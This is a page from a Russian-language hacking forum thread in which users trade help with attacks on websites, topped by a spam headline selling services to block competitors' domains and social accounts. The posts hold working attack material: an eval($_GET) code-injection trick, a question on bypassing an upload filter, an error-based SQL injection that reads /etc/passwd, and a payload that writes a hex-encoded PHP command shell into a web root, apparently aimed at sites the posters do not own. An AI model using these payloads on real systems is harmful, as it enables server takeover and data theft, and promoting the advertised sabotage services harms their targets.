УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 159 из 296

159

Опции темы

Поиск в этой теме

Опции просмотра

#1581

17.12.2016, 14:03

WallHack

Guest

Сообщений: n/a

Провел на форуме:
61136

Репутация: 32

Есть возможность записать в переменные произвольный текст.

Код:

Code:

Но вот проблема, max кол-во символов 15 на каждую переменную.

p.s

@`$c`- пробовал

#1582

17.12.2016, 15:29

qqq1457

Guest

Сообщений: n/a

Провел на форуме:
8589

Репутация: 0

15 символов для выполнения кода? /threads/307086/

пробуй это

/threads/307086/#post-2929944

#1583

17.12.2016, 15:57

WallHack

Guest

Сообщений: n/a

Провел на форуме:
61136

Репутация: 32

Цитата:

Сообщение от qqq1457

qqq1457 said:
↑
15 символов для выполнения кода?
/threads/307086/
пробуй это
/threads/307086/#post-2929944

Написал же: @`$c`- пробовал

----------

Не актуально, нашел решения

#1584

17.12.2016, 17:36

WallHack

Guest

Сообщений: n/a

Провел на форуме:
61136

Репутация: 32

Цитата:

Сообщение от qqq1457

qqq1457 said:
↑
мб
eval($_GET[1]); 15 символов

)

$mail = "eval($_GET[1]);"; - Так не будет работать

$mail = ""; $a1=eval($_GET[l]); echo "$a1"; - Так будет

----------

Не актуально, нашел решения

#1585

17.12.2016, 19:12

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от WallHack

WallHack said:
↑
)
$mail = "eval($_GET[1]);"
; - Так не будет работать
$mail = ""; $a1=eval($_GET[l]); echo "$a1";
- Так будет
----------
Не актуально, нашел решения

рассказал бы что ли

#1586

17.12.2016, 19:38

WallHack

Guest

Сообщений: n/a

Провел на форуме:
61136

Репутация: 32

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
рассказал бы что ли

Как-то так

Код:

Code:

#1587

17.12.2016, 21:56

Rastamanka

Познающий

Регистрация: 27.11.2008

Сообщений: 86

Провел на форуме:
264957

Репутация: 8

Отправить сообщение для Rastamanka с помощью ICQ

Добрый день.

Есть вот такой скрипт.

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$uploaddir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'dir/'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$uploadfile[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$uploaddir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'userfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]);

if ([/COLOR][COLOR="#0000BB"]move_uploaded_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'userfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$uploadfile[/COLOR][COLOR="#007700"])) {
  echo[/COLOR][COLOR="#DD0000"]"good"[/COLOR][COLOR="#007700"];
}

[/COLOR][/COLOR]

Есть ли возожность как-то обойти basename т.к. директории dir нету, то надо загрузить файл выше директорией)

#1588

22.12.2016, 22:46

foozzione

Guest

Сообщений: n/a

Провел на форуме:
19301

Репутация: 0

Apache 2.2.22

phpMyAdmin 3.4.11.1 (есть доступ, без прав на создание бд и загрузку)

SquirrelMail 1.4.23

на ip видит около 5ти сайтов, имеем wordpress 4.4.2(wpscan - http://pastebin.com/WuysyCNL)

PHP/5.4.45-0+deb7u1

В http://site/phpmyadmin/setup/ могу создать сервер без проблем - http://imgur.com/a/SxnIN

Что можно осуществить с этим? Некоторые вещи пробовал, но хочу выслушать ваши предложения

#1589

25.12.2016, 09:55

kacergei

Новичок

Регистрация: 26.05.2007

Сообщений: 8

Провел на форуме:
23906

Репутация: -5

Добрый подскажите как применить into outfile

При таком запросе:

Код:

Code:
http://localhost/'||(select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select load_file(0x2f6574632f706173737764) from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||'

Результат:
Duplicate entry 'root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin' for key 1

Как в таком запросе внедрить?

select '' into outfile '/var/www/html/UserFiles/shell.php'

#1590

25.12.2016, 16:55

qqq1457

Guest

Сообщений: n/a

Провел на форуме:
8589

Репутация: 0

http://localhost/'||(select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select код шелла в hex from mysql.user into outfile '/var/www/html/UserFiles/shell.php') from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||'

в твоем примере:

http://localhost/'||(select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select 0x3C3F7068702073797374656D28245F4745545B22636D6422 5D293B203F3E from mysql.user into outfile '/var/www/html/UserFiles/shell.php') from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||'

если current_user file_priv=Y

попробуй